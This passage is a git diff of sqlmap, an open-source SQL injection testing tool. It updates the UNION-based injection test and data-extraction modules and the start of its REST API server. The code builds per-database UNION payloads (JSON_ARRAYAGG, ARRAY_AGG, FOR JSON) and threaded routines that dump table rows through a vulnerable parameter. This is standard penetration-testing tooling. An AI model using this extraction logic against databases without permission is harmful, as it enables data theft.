maybe invalid altogether) + conf.uChar, kb.uChar = uChars + validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix) + return validPayload, vector +@stackedmethod def unionTest(comment, place, parameter, value, prefix, suffix): """ - This method tests if the target url is affected by an union + This method tests if the target URL is affected by an union SQL injection vulnerability. The test is done up to 3*50 times """ if conf.direct: return - kb.technique = PAYLOAD.TECHNIQUE.UNION - validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix) + negativeLogic = kb.negativeLogic + setTechnique(PAYLOAD.TECHNIQUE.UNION) + + try: + if negativeLogic: + pushValue(kb.negativeLogic) + pushValue(conf.string) + pushValue(conf.code) + + kb.negativeLogic = False + conf.string = conf.code = None + + validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix) + finally: + if negativeLogic: + conf.code = popValue() + conf.string = popValue() + kb.negativeLogic = popValue() if validPayload: validPayload = agent.removePayloadDelimiters(validPayload) diff --git a/lib/techniques/union/use.py b/lib/techniques/union/use.py index efe62cb0a46..b544b56acde 100644 --- a/lib/techniques/union/use.py +++ b/lib/techniques/union/use.py @@ -1,14 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import json import re import time -from extra.safe2bin.safe2bin import safecharencode from lib.core.agent import agent from lib.core.bigarray import BigArray from lib.core.common import arrayizeValue @@ -17,13 +17,15 @@ from lib.core.common import clearConsoleLine from lib.core.common import dataToStdout from lib.core.common import extractRegexResult +from lib.core.common import firstNotNone from lib.core.common import flattenValue from lib.core.common import getConsoleWidth -from lib.core.common import getUnicode +from lib.core.common import getPartRun from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite from lib.core.common import incrementCounter from lib.core.common import initTechnique +from lib.core.common import isDigit from lib.core.common import isListLike from lib.core.common import isNoneValue from lib.core.common import isNumPosStrValue @@ -33,109 +35,202 @@ from lib.core.common import singleTimeDebugMessage from lib.core.common import singleTimeWarnMessage from lib.core.common import unArrayizeValue -from lib.core.common import wasLastRequestDBMSError -from lib.core.convert import htmlunescape +from lib.core.common import wasLastResponseDBMSError +from lib.core.compat import xrange +from lib.core.convert import decodeBase64 +from lib.core.convert import getUnicode +from lib.core.convert import htmlUnescape from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.enums import DBMS +from lib.core.enums import HTTP_HEADER from lib.core.enums import PAYLOAD +from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapSyntaxException +from lib.core.settings import MAX_BUFFERED_PARTIAL_UNION_LENGTH +from lib.core.settings import NULL from lib.core.settings import SQL_SCALAR_REGEX from lib.core.settings import 
TURN_OFF_RESUME_INFO_LIMIT from lib.core.threads import getCurrentThreadData from lib.core.threads import runThreads from lib.core.unescaper import unescaper from lib.request.connect import Connect as Request +from lib.utils.progress import ProgressBar +from lib.utils.safe2bin import safecharencode +from thirdparty import six +from thirdparty.odict import OrderedDict def _oneShotUnionUse(expression, unpack=True, limited=False): - retVal = hashDBRetrieve("%s%s" % (conf.hexConvert, expression), checkConf=True) # as union data is stored raw unconverted + retVal = hashDBRetrieve("%s%s" % (conf.hexConvert or False, expression), checkConf=True) # as UNION data is stored raw unconverted threadData = getCurrentThreadData() threadData.resumed = retVal is not None if retVal is None: - # Prepare expression with delimiters - injExpression = unescaper.escape(agent.concatQuery(expression, unpack)) + vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector - where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else None + if not kb.jsonAggMode: + injExpression = unescaper.escape(agent.concatQuery(expression, unpack)) + kb.unionDuplicates = vector[7] + kb.forcePartialUnion = vector[8] + + # Note: introduced columns in 1.4.2.42#dev + try: + kb.tableFrom = vector[9] + kb.unionTemplate = vector[10] + except IndexError: + pass + + query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited) + where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else vector[6] + else: + injExpression = unescaper.escape(expression) + where = vector[6] + query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, False) - # Forge the union SQL injection request - vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector - kb.unionDuplicates = vector[7] - query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited) payload = agent.payload(newValue=query, where=where) # Perform the request - page, headers = Request.queryPage(payload, content=True, raise404=False) + page, headers, _ = Request.queryPage(payload, content=True, raise404=False) - incrementCounter(PAYLOAD.TECHNIQUE.UNION) + if page and kb.chars.start.upper() in page and kb.chars.start not in page: + singleTimeWarnMessage("results seems to be upper-cased by force. 
sqlmap will automatically lower-case them") - # Parse the returned page to get the exact union-based - # SQL injection output - def _(regex): - return reduce(lambda x, y: x if x is not None else y, (\ - extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE), \ - extractRegexResult(regex, removeReflectiveValues(listToStrValue(headers.headers \ - if headers else None), payload, True), re.DOTALL | re.IGNORECASE)), \ - None) + page = page.lower() - # Automatically patching last char trimming cases - if kb.chars.stop not in (page or "") and kb.chars.stop[:-1] in (page or ""): - warnMsg = "automatically patching output having last char trimmed" - singleTimeWarnMessage(warnMsg) - page = page.replace(kb.chars.stop[:-1], kb.chars.stop) + incrementCounter(PAYLOAD.TECHNIQUE.UNION) - retVal = _("(?P<result>%s.*%s)" % (kb.chars.start, kb.chars.stop)) + if kb.jsonAggMode: + for _page in (page or "", (page or "").replace('\\"', '"')): + if Backend.isDbms(DBMS.MSSQL): + output = extractRegexResult(r"%s(?P<result>.*)%s" % (kb.chars.start, kb.chars.stop), removeReflectiveValues(_page, payload)) + + if output: + try: + retVal = None + output_decoded = htmlUnescape(output) + json_data = json.loads(output_decoded, object_pairs_hook=OrderedDict) + + if not isinstance(json_data, list): + json_data = [json_data] + + if json_data and isinstance(json_data[0], dict): + fields = list(json_data[0].keys()) + + if fields: + parts = [] + for row in json_data: + parts.append("%s%s%s" % (kb.chars.start, kb.chars.delimiter.join(getUnicode(row.get(field) or NULL) for field in fields), kb.chars.stop)) + retVal = "".join(parts) + except: + retVal = None + else: + retVal = getUnicode(retVal) + elif Backend.isDbms(DBMS.PGSQL): + output = extractRegexResult(r"(?P<result>%s.*%s)" % (kb.chars.start, kb.chars.stop), removeReflectiveValues(_page, payload)) + if output: + retVal = output + else: + output = extractRegexResult(r"%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop), removeReflectiveValues(_page, payload)) + if output: + try: + retVal = "" + for row in json.loads(output): + # NOTE: for cases with automatic MySQL Base64 encoding of JSON array values, like: ["base64:type15:MQ=="] + for match in re.finditer(r"base64:type\d+:([^ ]+)", row): + row = row.replace(match.group(0), decodeBase64(match.group(1), binary=False)) + retVal += "%s%s%s" % (kb.chars.start, row, kb.chars.stop) + except: + retVal = None + else: + retVal = getUnicode(retVal) + + if retVal: + break + else: + # Parse the returned page to get the exact UNION-based + # SQL injection output + def _(regex): + return firstNotNone( + extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE), + extractRegexResult(regex, removeReflectiveValues(listToStrValue((_ for _ in headers.headers if not _.startswith(HTTP_HEADER.URI)) if headers else None), payload, True), re.DOTALL | re.IGNORECASE) + ) + + # Automatically patching last char trimming cases + if kb.chars.stop not in (page or "") and kb.chars.stop[:-1] in (page or ""): + warnMsg = "automatically patching output having last char trimmed" + singleTimeWarnMessage(warnMsg) + page = page.replace(kb.chars.stop[:-1], kb.chars.stop) + + retVal = _("(?P<result>%s.*%s)" % (kb.chars.start, kb.chars.stop)) if retVal is not None: retVal = getUnicode(retVal, kb.pageEncoding) - # Special case when DBMS is Microsoft SQL Server and error message is used as a result of union injection - if Backend.isDbms(DBMS.MSSQL) and wasLastRequestDBMSError(): - retVal = 
htmlunescape(retVal).replace("<br>", "\n") + # Special case when DBMS is Microsoft SQL Server and error message is used as a result of UNION injection + if Backend.isDbms(DBMS.MSSQL) and wasLastResponseDBMSError(): + retVal = htmlUnescape(retVal).replace("<br>", "\n") - hashDBWrite("%s%s" % (conf.hexConvert, expression), retVal) - else: + hashDBWrite("%s%s" % (conf.hexConvert or False, expression), retVal) + + elif not kb.jsonAggMode: trimmed = _("%s(?P<result>.*?)<" % (kb.chars.start)) if trimmed: warnMsg = "possible server trimmed output detected " warnMsg += "(probably due to its length and/or content): " warnMsg += safecharencode(trimmed) - logger.warn(warnMsg) + logger.warning(warnMsg) + + elif re.search(r"ORDER BY [^ ]+\Z", expression): + debugMsg = "retrying failed SQL query without the ORDER BY clause" + singleTimeDebugMessage(debugMsg) + + expression = re.sub(r"\s*ORDER BY [^ ]+\Z", "", expression) + retVal = _oneShotUnionUse(expression, unpack, limited) + + elif kb.nchar and re.search(r" AS N(CHAR|VARCHAR)", agent.nullAndCastField(expression)): + debugMsg = "turning off NATIONAL CHARACTER casting" # NOTE: in some cases there are "known" incompatibilities between original columns and NCHAR (e.g. http://testphp.vulnweb.com/artists.php?artist=1) + singleTimeDebugMessage(debugMsg) + + kb.nchar = False + retVal = _oneShotUnionUse(expression, unpack, limited) + else: + vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector + kb.unionDuplicates = vector[7] return retVal def configUnion(char=None, columns=None): def _configUnionChar(char): - if not isinstance(char, basestring): + if not isinstance(char, six.string_types): return kb.uChar = char if conf.uChar is not None: - kb.uChar = char.replace("[CHAR]", conf.uChar if conf.uChar.isdigit() else "'%s'" % conf.uChar.strip("'")) + kb.uChar = char.replace("[CHAR]", conf.uChar if isDigit(conf.uChar) else "'%s'" % conf.uChar.strip("'")) def _configUnionCols(columns): - if not isinstance(columns, basestring): + if not isinstance(columns, six.string_types): return - columns = columns.replace(" ", "") - if "-" in columns: - colsStart, colsStop = columns.split("-") + columns = columns.replace(' ', "") + if '-' in columns: + colsStart, colsStop = columns.split('-') else: colsStart, colsStop = columns, columns - if not colsStart.isdigit() or not colsStop.isdigit(): + if not isDigit(colsStart) or not isDigit(colsStop): raise SqlmapSyntaxException("--union-cols must be a range of integers") conf.uColsStart, conf.uColsStop = int(colsStart), int(colsStop) if conf.uColsStart > conf.uColsStop: - errMsg = "--union-cols range has to be from lower to " + errMsg = "--union-cols range has to represent lower to " errMsg += "higher number of columns" raise SqlmapSyntaxException(errMsg) @@ -144,9 +239,9 @@ def _configUnionCols(columns): def unionUse(expression, unpack=True, dump=False): """ - This function tests for an union SQL injection on the target - url then call its subsidiary function to effectively perform an - union SQL injection on the affected url + This function tests for an UNION SQL injection on the target + URL then call its subsidiary function to effectively perform an + UNION SQL injection on the affected URL """ initTechnique(PAYLOAD.TECHNIQUE.UNION) @@ -163,24 +258,40 @@ def unionUse(expression, unpack=True, dump=False): _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(origExpr) + # Set kb.partRun in case the engine is called from the API + kb.partRun = getPartRun(alias=False) if conf.api else None + if 
expressionFieldsList and len(expressionFieldsList) > 1 and "ORDER BY" in expression.upper(): # Removed ORDER BY clause because UNION does not play well with it - expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I) + expression = re.sub(r"(?i)\s*ORDER BY\s+[\w,]+", "", expression) debugMsg = "stripping ORDER BY clause from statement because " debugMsg += "it does not play well with UNION query SQL injection" singleTimeDebugMessage(debugMsg) + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ORACLE, DBMS.PGSQL, DBMS.MSSQL, DBMS.SQLITE) and expressionFields and not any((conf.binaryFields, conf.limitStart, conf.limitStop, conf.forcePartial, conf.disableJson)): + match = re.search(r"SELECT\s*(.+?)\bFROM", expression, re.I) + if match and not (Backend.isDbms(DBMS.ORACLE) and FROM_DUMMY_TABLE[DBMS.ORACLE] in expression) and not re.search(r"\b(MIN|MAX|COUNT|EXISTS)\(", expression): + kb.jsonAggMode = True + if Backend.isDbms(DBMS.MYSQL): + query = expression.replace(expressionFields, "CONCAT('%s',JSON_ARRAYAGG(CONCAT_WS('%s',%s)),'%s')" % (kb.chars.start, kb.chars.delimiter, ','.join(agent.nullAndCastField(field) for field in expressionFieldsList), kb.chars.stop), 1) + elif Backend.isDbms(DBMS.ORACLE): + query = expression.replace(expressionFields, "'%s'||JSON_ARRAYAGG(%s)||'%s'" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join(expressionFieldsList), kb.chars.stop), 1) + elif Backend.isDbms(DBMS.SQLITE): + query = expression.replace(expressionFields, "'%s'||JSON_GROUP_ARRAY(%s)||'%s'" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join("COALESCE(%s,' ')" % field for field in expressionFieldsList), kb.chars.stop), 1) + elif Backend.isDbms(DBMS.PGSQL): # Note: ARRAY_AGG does CSV alike output, thus enclosing start/end inside each item + query = expression.replace(expressionFields, "ARRAY_AGG('%s'||%s||'%s')::text" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join("COALESCE(%s::text,' ')" % field for field in expressionFieldsList), kb.chars.stop), 1) + elif Backend.isDbms(DBMS.MSSQL): + query = "'%s'+(%s FOR JSON AUTO, INCLUDE_NULL_VALUES)+'%s'" % (kb.chars.start, expression, kb.chars.stop) + output = _oneShotUnionUse(query, False) + value = parseUnionPage(output) + kb.jsonAggMode = False + # We have to check if the SQL query might return multiple entries # if the technique is partial UNION query and in such case forge the # SQL limiting the query output one entry at a time # NOTE: we assume that only queries that get data from a table can # return multiple entries - if (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or \ - (dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and \ - " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \ - not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE \ - and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ - and not re.search(SQL_SCALAR_REGEX, expression, re.I): + if value is None and (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or kb.forcePartialUnion or conf.forcePartial or (dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and not re.search(SQL_SCALAR_REGEX, expression, re.I): expression, limitCond, 
topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump) if limitCond: @@ -200,127 +311,157 @@ def unionUse(expression, unpack=True, dump=False): else: stopLimit = int(count) - infoMsg = "the SQL query used returns " - infoMsg += "%d entries" % stopLimit - logger.info(infoMsg) + debugMsg = "used SQL query returns " + debugMsg += "%d %s" % (stopLimit, "entries" if stopLimit > 1 else "entry") + logger.debug(debugMsg) - elif count and (not isinstance(count, basestring) or not count.isdigit()): + elif count and (not isinstance(count, six.string_types) or not count.isdigit()): warnMsg = "it was not possible to count the number " warnMsg += "of entries for the SQL query provided. " warnMsg += "sqlmap will assume that it returns only " warnMsg += "one entry" - logger.warn(warnMsg) + logger.warning(warnMsg) stopLimit = 1 - elif (not count or int(count) == 0): + elif not isNumPosStrValue(count): if not count: warnMsg = "the SQL query provided does not " warnMsg += "return any output" - logger.warn(warnMsg) + logger.warning(warnMsg) else: value = [] # for empty tables return value - threadData = getCurrentThreadData() - threadData.shared.limits = iter(xrange(startLimit, stopLimit)) - numThreads = min(conf.threads, (stopLimit - startLimit)) - threadData.shared.value = BigArray() - threadData.shared.buffered = [] - threadData.shared.lastFlushed = startLimit - 1 + if isNumPosStrValue(count) and int(count) > 1: + threadData = getCurrentThreadData() + + try: + threadData.shared.limits = iter(xrange(startLimit, stopLimit)) + except OverflowError: + errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit) + errMsg += "with switch '--fresh-queries'" + raise SqlmapDataException(errMsg) + + numThreads = min(conf.threads, (stopLimit - startLimit)) + threadData.shared.value = BigArray() + threadData.shared.buffered = [] + threadData.shared.counter = 0 + threadData.shared.lastFlushed = startLimit - 1 + threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 + + if threadData.shared.showEta: + threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit)) + + if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: + kb.suppressResumeInfo = True + debugMsg = "suppressing possible resume console info for " + debugMsg += "large number of rows as it might take too long" + logger.debug(debugMsg) + + try: + def unionThread(): + threadData = getCurrentThreadData() + + while kb.threadContinue: + with kb.locks.limit: + try: + threadData.shared.counter += 1 + num = next(threadData.shared.limits) + except StopIteration: + break + + if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): + field = expressionFieldsList[0] + elif Backend.isDbms(DBMS.ORACLE): + field = expressionFieldsList + else: + field = None - if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: - kb.suppressResumeInfo = True - debugMsg = "suppressing possible resume console info because of " - debugMsg += "large number of rows. 
It might take too long" - logger.debug(debugMsg) + limitedExpr = agent.limitQuery(num, expression, field) + output = _oneShotUnionUse(limitedExpr, unpack, True) - try: - def unionThread(): - threadData = getCurrentThreadData() - - while kb.threadContinue: - with kb.locks.limit: - try: - num = threadData.shared.limits.next() - except StopIteration: + if not kb.threadContinue: break - if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): - field = expressionFieldsList[0] - elif Backend.isDbms(DBMS.ORACLE): - field = expressionFieldsList - else: - field = None - - limitedExpr = agent.limitQuery(num, expression, field) - output = _oneShotUnionUse(limitedExpr, unpack, True) - - if not kb.threadContinue: - break - - if output: - if all(map(lambda _: _ in output, (kb.chars.start, kb.chars.stop))): - items = parseUnionPage(output) - + if output: with kb.locks.value: - # in case that we requested N columns and we get M!=N then we have to filter a bit - if isListLike(items) and len(items) > 1 and len(expressionFieldsList) > 1: - items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)] - index = None - for index in xrange(len(threadData.shared.buffered)): - if threadData.shared.buffered[index][0] >= num: - break - threadData.shared.buffered.insert(index or 0, (num, items)) - while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]: - threadData.shared.lastFlushed += 1 - _ = threadData.shared.buffered[0][1] + if all(_ in output for _ in (kb.chars.start, kb.chars.stop)): + items = parseUnionPage(output) + + if threadData.shared.showEta: + threadData.shared.progress.progress(threadData.shared.counter) + if isListLike(items): + # in case that we requested N columns and we get M!=N then we have to filter a bit + if len(items) > 1 and len(expressionFieldsList) > 1: + items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)] + items = [_ for _ in flattenValue(items)] + if len(items) > len(expressionFieldsList): + filtered = OrderedDict() + for item in items: + key = re.sub(r"[^A-Za-z0-9]", "", item).lower() + if key not in filtered or re.search(r"[^A-Za-z0-9]", item): + filtered[key] = item + items = list(six.itervalues(filtered)) + items = [items] + index = None + for index in xrange(1 + len(threadData.shared.buffered)): + if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num: + break + threadData.shared.buffered.insert(index or 0, (num, items)) + else: + index = None + if threadData.shared.showEta: + threadData.shared.progress.progress(threadData.shared.counter) + for index in xrange(1 + len(threadData.shared.buffered)): + if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num: + break + threadData.shared.buffered.insert(index or 0, (num, None)) + + items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter) + + while threadData.shared.buffered and (threadData.shared.lastFlushed + 1 >= threadData.shared.buffered[0][0] or len(threadData.shared.buffered) > MAX_BUFFERED_PARTIAL_UNION_LENGTH): + threadData.shared.lastFlushed, _ = threadData.shared.buffered[0] if not isNoneValue(_): threadData.shared.value.extend(arrayizeValue(_)) del threadData.shared.buffered[0] - else: - with kb.locks.value: - index = None - for index in xrange(len(threadData.shared.buffered)): - if threadData.shared.buffered[index][0] >= num: - break - threadData.shared.buffered.insert(index or 0, 
(num, None)) - items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter) - if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo): - status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", safecharencode(",".join("\"%s\"" % _ for _ in flattenValue(arrayizeValue(items))))) + if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo) and not threadData.shared.showEta and not kb.bruteMode: + _ = ','.join("'%s'" % _ for _ in (flattenValue(arrayizeValue(items)) if not isinstance(items, six.string_types) else [items])) + status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", _ if kb.safeCharEncode else safecharencode(_)) - if len(status) > width: - status = "%s..." % status[:width - 3] + if len(status) > width and not conf.noTruncate: + status = "%s..." % status[:width - 3] - dataToStdout("%s\r\n" % status, True) + dataToStdout("%s\n" % status) - runThreads(numThreads, unionThread) + runThreads(numThreads, unionThread) - if conf.verbose == 1: - clearConsoleLine(True) + if conf.verbose == 1: + clearConsoleLine(True) - except KeyboardInterrupt: - abortedFlag = True + except KeyboardInterrupt: + abortedFlag = True - warnMsg = "user aborted during enumeration. sqlmap " - warnMsg += "will display partial output" - logger.warn(warnMsg) + warnMsg = "user aborted during enumeration. sqlmap " + warnMsg += "will display partial output" + logger.warning(warnMsg) - finally: - for _ in sorted(threadData.shared.buffered): - if not isNoneValue(_[1]): - threadData.shared.value.extend(arrayizeValue(_[1])) - value = threadData.shared.value - kb.suppressResumeInfo = False + finally: + for _ in sorted(threadData.shared.buffered): + if not isNoneValue(_[1]): + threadData.shared.value.extend(arrayizeValue(_[1])) + value = threadData.shared.value + kb.suppressResumeInfo = False if not value and not abortedFlag: - value = _oneShotUnionUse(expression, unpack) + output = _oneShotUnionUse(expression, unpack) + value = parseUnionPage(output) duration = calculateDeltaSeconds(start) if not kb.bruteMode: - debugMsg = "performed %d queries in %d seconds" % (kb.counters[PAYLOAD.TECHNIQUE.UNION], duration) + debugMsg = "performed %d quer%s in %.2f seconds" % (kb.counters[PAYLOAD.TECHNIQUE.UNION], 'y' if kb.counters[PAYLOAD.TECHNIQUE.UNION] == 1 else "ies", duration) logger.debug(debugMsg) return value diff --git a/lib/utils/__init__.py b/lib/utils/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/lib/utils/__init__.py +++ b/lib/utils/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/lib/utils/api.py b/lib/utils/api.py index 92667353606..b0242b3adf7 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -1,119 +1,161 @@ #!/usr/bin/env python +# -*- coding: utf-8 -*- """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from __future__ import print_function + +import contextlib import logging import os -import shutil +import re +import shlex +import socket import sqlite3 import sys import tempfile +import threading import time 
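# --- Editor's note (not part of the patch): a rough client-side sketch of how the
# REST-JSON API routes defined further below (/task/new, /option/<taskid>/set,
# /scan/<taskid>/start, /scan/<taskid>/status, /scan/<taskid>/data,
# /task/<taskid>/delete) are meant to be driven. The default address/port
# (127.0.0.1:8775) and the target URL are assumptions for illustration only.

import json
import time
try:
    from urllib.request import Request, urlopen    # Python 3
except ImportError:
    from urllib2 import Request, urlopen            # Python 2 fallback

API = "http://127.0.0.1:8775"

def call(path, data=None):
    # POST JSON when data is given, otherwise plain GET; every route answers with JSON
    req = Request(API + path,
                  data=json.dumps(data).encode() if data is not None else None,
                  headers={"Content-Type": "application/json"})
    return json.loads(urlopen(req).read().decode())

taskid = call("/task/new")["taskid"]                                    # create a new task
call("/scan/%s/start" % taskid,
     {"url": "http://testphp.vulnweb.com/artists.php?artist=1"})        # start the engine

while call("/scan/%s/status" % taskid)["status"] == "running":          # poll until it exits
    time.sleep(5)

print(call("/scan/%s/data" % taskid)["data"])                           # fetch stored results
call("/task/%s/delete" % taskid)                                        # clean up the task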
-from subprocess import PIPE - +from lib.core.common import dataToStdout +from lib.core.common import getSafeExString +from lib.core.common import openFile +from lib.core.common import saveConfig +from lib.core.common import setColor from lib.core.common import unArrayizeValue -from lib.core.convert import base64pickle -from lib.core.convert import base64unpickle -from lib.core.convert import hexencode +from lib.core.compat import xrange +from lib.core.convert import decodeBase64 from lib.core.convert import dejsonize +from lib.core.convert import encodeBase64 +from lib.core.convert import encodeHex +from lib.core.convert import getBytes +from lib.core.convert import getText from lib.core.convert import jsonize from lib.core.data import conf -from lib.core.data import paths +from lib.core.data import kb from lib.core.data import logger +from lib.core.data import paths from lib.core.datatype import AttribDict from lib.core.defaults import _defaults +from lib.core.dicts import PART_RUN_CONTENT_TYPES +from lib.core.enums import AUTOCOMPLETE_TYPE +from lib.core.enums import CONTENT_STATUS +from lib.core.enums import MKSTEMP_PREFIX +from lib.core.exception import SqlmapConnectionException from lib.core.log import LOGGER_HANDLER from lib.core.optiondict import optDict +from lib.core.settings import IS_WIN +from lib.core.settings import RESTAPI_DEFAULT_ADAPTER +from lib.core.settings import RESTAPI_DEFAULT_ADDRESS +from lib.core.settings import RESTAPI_DEFAULT_PORT +from lib.core.settings import RESTAPI_UNSUPPORTED_OPTIONS +from lib.core.settings import VERSION_STRING +from lib.core.shell import autoCompletion from lib.core.subprocessng import Popen -from lib.core.subprocessng import send_all -from lib.core.subprocessng import recv_some -from thirdparty.bottle.bottle import abort -from thirdparty.bottle.bottle import error +from lib.parse.cmdline import cmdLineParser +from thirdparty.bottle.bottle import error as return_error from thirdparty.bottle.bottle import get from thirdparty.bottle.bottle import hook from thirdparty.bottle.bottle import post from thirdparty.bottle.bottle import request from thirdparty.bottle.bottle import response from thirdparty.bottle.bottle import run -from thirdparty.bottle.bottle import static_file - -RESTAPI_SERVER_HOST = "127.0.0.1" -RESTAPI_SERVER_PORT = 8775 - -# Local global variables -adminid = "" -db = None -tasks = dict() +from thirdparty.bottle.bottle import server_names +from thirdparty import six +from thirdparty.six.moves import http_client as _http_client +from thirdparty.six.moves import input as _input +from thirdparty.six.moves import urllib as _urllib + +# Global data storage +class DataStore(object): + admin_token = "" + current_db = None + tasks = dict() + username = None + password = None # API objects class Database(object): - LOGS_TABLE = "CREATE TABLE logs(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, time TEXT, level TEXT, message TEXT)" - DATA_TABLE = "CREATE TABLE data(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, status INTEGER, content_type INTEGER, value TEXT)" - ERRORS_TABLE = "CREATE TABLE errors(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, error TEXT)" + filepath = None - def __init__(self): - pass - - def create(self): - _, self.database = tempfile.mkstemp(prefix="sqlmapipc-", text=False) - logger.info("IPC database is %s" % self.database) + def __init__(self, database=None): + self.database = self.filepath if database is None else database + self.connection = None + self.cursor = None - def connect(self): - 
self.connection = sqlite3.connect(self.database, timeout=1, isolation_level=None) + def connect(self, who="server"): + self.connection = sqlite3.connect(self.database, timeout=3, isolation_level=None, check_same_thread=False) self.cursor = self.connection.cursor() + self.lock = threading.Lock() + logger.debug("REST-JSON API %s connected to IPC database" % who) def disconnect(self): - self.cursor.close() - self.connection.close() + if self.cursor: + self.cursor.close() + + if self.connection: + self.connection.close() + + def commit(self): + self.connection.commit() def execute(self, statement, arguments=None): - if arguments: - self.cursor.execute(statement, arguments) - else: - self.cursor.execute(statement) + with self.lock: + while True: + try: + if arguments: + self.cursor.execute(statement, arguments) + else: + self.cursor.execute(statement) + except sqlite3.OperationalError as ex: + if "locked" not in getSafeExString(ex): + raise + else: + time.sleep(1) + else: + break if statement.lstrip().upper().startswith("SELECT"): return self.cursor.fetchall() - def initialize(self): - self.create() - self.connect() - self.execute(self.LOGS_TABLE) - self.execute(self.DATA_TABLE) - self.execute(self.ERRORS_TABLE) - - def get_filepath(self): - return self.database + def init(self): + self.execute("CREATE TABLE IF NOT EXISTS logs(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, time TEXT, level TEXT, message TEXT)") + self.execute("CREATE TABLE IF NOT EXISTS data(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, status INTEGER, content_type INTEGER, value TEXT)") + self.execute("CREATE TABLE IF NOT EXISTS errors(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, error TEXT)") class Task(object): - global db - - def __init__(self, taskid): + def __init__(self, taskid, remote_addr): + self.remote_addr = remote_addr self.process = None self.output_directory = None + self.options = None + self._original_options = None self.initialize_options(taskid) def initialize_options(self, taskid): - dataype = {"boolean": False, "string": None, "integer": None, "float": None} + datatype = {"boolean": False, "string": None, "integer": None, "float": None} self.options = AttribDict() for _ in optDict: for name, type_ in optDict[_].items(): type_ = unArrayizeValue(type_) - self.options[name] = _defaults.get(name, dataype[type_]) + self.options[name] = _defaults.get(name, datatype[type_]) - # Let sqlmap engine knows it is getting called by the API, the task ID and the file path of the IPC database + # Let sqlmap engine knows it is getting called by the API, + # the task ID 